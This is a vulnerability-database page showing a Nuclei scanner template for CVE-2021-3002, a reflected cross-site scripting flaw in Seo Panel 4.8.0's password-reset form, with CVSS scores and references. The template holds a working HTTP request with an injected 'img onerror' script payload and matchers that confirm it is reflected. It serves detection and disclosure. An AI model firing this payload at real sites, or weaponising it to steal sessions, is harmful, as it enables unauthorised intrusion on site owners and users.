Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-3002

HistoryMar 07, 2022 - 7:47 p.m.

Seo Panel 4.8.0 - Cross-Site Scripting

2022-03-0719:47:40

ProjectDiscovery

github.com

cve2021

seopanel

cross-site scripting

web pages

data theft

session hijacking

web security

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.4%

JSON

Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.

id: CVE-2021-3002

info:
  name: Seo Panel 4.8.0 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.
  reference:
    - http://www.cinquino.eu/SeoPanelReflect.htm
    - https://github.com/seopanel/Seo-Panel/issues/202
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ArrestX/--POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-3002
    cwe-id: CWE-79
    epss-score: 0.00143
    epss-percentile: 0.50121
    cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: seopanel
    product: seo_panel
  tags: cve2021,cve,seopanel,xss

http:
  - raw:
      - |
        POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "seopanel"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022075e88f3f4bc875a9a0bb1b5fd257624b8a290b5de6c2cc98d0fd95f5d30e286402204d1a6aa490440a2c56dfa06bf3b9ff9bc4daab09bb4441a8d18099d73e218936:922c64590222798bb761d5b6d8e72950

References

www.cinquino.eu/SeoPanelReflect.htm

github.com/ARPSyndicate/kenzer-templates

github.com/ArrestX/--POC

github.com/seopanel/Seo-Panel/issues/202

nvd.nist.gov/vuln/detail/CVE-2021-3002

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

50.4%

JSON

Related for NUCLEI:CVE-2021-3002